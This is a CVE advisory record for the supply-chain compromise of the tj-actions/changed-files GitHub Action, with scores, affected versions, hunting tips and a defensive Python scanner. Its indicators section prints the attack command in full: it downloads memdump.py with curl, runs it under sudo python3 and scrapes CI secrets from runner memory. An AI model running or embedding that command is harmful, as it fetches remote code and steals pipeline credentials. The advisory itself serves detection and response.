CVE-2025-30066
published 2025-03-15


Priority: P1 (86)
CVSS 3.1: 8.6 (High), vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
KEV, ITW
CISA Known Exploited Vulnerability, due 2025-04-08
Exploited in the wild
EPSS: 41.01% (98.5th percentile)
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.)

Affected (3 ranges)

Vendor       Product         Version range       Fixed in
tj-actions   changed-files   <= 45.0.7           -
tj-actions   changed-files   >= 0, < 46.0.1      46.0.1
tj-actions   changed-files   >= 1, < 46          46

Detection & IOCs (extracted from sources)

hash: 0e58ed8671d6b60d0890c21b07f8835ace038e67
url: https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py
filename: memdump.py
command: curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0
process: Runner.Worker
sigma: dataSource.name = 'SentinelOne' and endpoint.os = 'linux' and event.type = 'Process Creation' and (tgt.process.name in:anycase ('curl') or tgt.process.displayName = 'curl') and tgt.process.cmdline contains '-sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3'
  • Search workflow logs for double-encoded base64 strings within the 'changed-files' step output — presence indicates successful malicious payload execution
  • Hunt for workflow runs referencing the malicious commit hash 0e58ed8 or the full SHA 0e58ed8671d6b60d0890c21b07f8835ace038e67 in GitHub Actions workflow files
  • Audit CI/CD workflow logs from March 14–15, 2025 for outbound curl requests to gist.githubusercontent.com fetching memdump.py, indicating active exploitation
  • Use GitHub code search to identify repositories in your org referencing tj-actions/changed-files: https://github.com/search?q=org:+tj-actions/changed-files&type=code
  • Leaked secrets to look for in exposed workflow logs include AWS access keys, GitHub PATs (ghs_ prefix), npm tokens, and private RSA keys
  • ghs_-prefixed GitHub tokens exposed in logs carry limited long-term risk as they expire within 24 hours or on workflow job completion; prioritize rotating other secret types
  • Investigate the reviewdog/action-setup GitHub Action as a potential initial access vector that may have contributed to the compromise of tj-actions/changed-files
  • Only repositories using hash-pinned versions of tj-actions/changed-files were unaffected; all tag-based references (v1 through v45.0.7) were retroactively poisoned to point at the malicious commit
  • No external C2 exfiltration was observed; secrets were only dumped into workflow logs (double-encoded base64), meaning private repositories with non-public logs had limited exposure
  • Workflows that do not explicitly reference custom secrets (e.g., secrets.MYSECRET) are unlikely to have had sensitive secrets compromised
  • The GitHub Gist hosting memdump.py was taken down on March 15, 2025, and the compromised repository was restored; cached actions may still pose a residual risk
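An added example (not part of this record and not tj-actions' own code) that turns the indicators above into two defender-side checks: classifying every tj-actions/changed-files reference in a workflow file against the affected ranges (tag refs below 46 are affected; a full-SHA pin is flagged only when it equals the malicious commit), and scanning workflow log text for the double-base64-encoded secret dumps the injected command produced. The sample workflow and log are constructed; the secret-matching pattern is the one from the injected command.

```python
import base64
import binascii
import re

# Full SHA of the commit the advisory names as malicious (0e58ed8...).
MALICIOUS_SHA = "0e58ed8671d6b60d0890c21b07f8835ace038e67"
USES_RE = re.compile(r'''uses:\s*['"]?tj-actions/changed-files@([^\s'"#]+)''')
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
TAG_RE = re.compile(r"^v?(\d+)(?:\.\d+){0,2}$")
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Same pattern the injected command used to grep secrets out of the Runner.Worker memory dump.
SECRET_RE = re.compile(r'"([^"]+)":\{"value":"[^"]*","isSecret":true\}')

def classify_ref(ref: str) -> str:
    """Map a changed-files ref to the advisory's affected/fixed ranges."""
    if SHA_RE.match(ref):
        return "malicious" if ref == MALICIOUS_SHA else "pinned"
    m = TAG_RE.match(ref)
    if not m:
        return "unknown"  # branch names such as 'main': cannot be judged from the ref alone
    return "affected" if int(m.group(1)) < 46 else "fixed"

def scan_workflow(text: str) -> list:
    """Return (ref, verdict) for every tj-actions/changed-files step in a workflow file."""
    return [(ref, classify_ref(ref)) for ref in USES_RE.findall(text)]

def find_double_encoded_secrets(log_text: str) -> list:
    """Return secret names carried by double-base64-encoded blobs in a workflow log."""
    names = []
    for blob in B64_RE.findall(log_text):
        try:
            inner = base64.b64decode(base64.b64decode(blob, validate=True), validate=True)
        except (binascii.Error, ValueError):
            continue  # not a well-formed double-encoded blob (e.g. a bare commit SHA)
        names.extend(SECRET_RE.findall(inner.decode("utf-8", "replace")))
    return names

# Constructed sample inputs (not real leaked data): a workflow with one affected and one
# fixed ref, and a log containing a blob of the shape the injected command would emit.
SAMPLE_WORKFLOW = ("steps:\n"
                   "  - uses: tj-actions/changed-files@v45.0.7\n"
                   "  - uses: tj-actions/changed-files@46.0.1\n")
_INNER = (b'"AWS_ACCESS_KEY_ID":{"value":"AKIAEXAMPLE","isSecret":true}\n'
          b'"NPM_TOKEN":{"value":"npm_example","isSecret":true}\n')
SAMPLE_LOG = ("##[group]Run changed-files\n"
              + base64.b64encode(base64.b64encode(_INNER)).decode()
              + "\n##[endgroup]\n")
```

Run `scan_workflow` over each file under `.github/workflows/` and `find_double_encoded_secrets` over downloaded job logs from the March 14-15 window; any name it returns is a secret to rotate.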

CVSS provenance

nvd: v3.1 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
vulncheck: 8.6 HIGH
cisa: 8.6 HIGH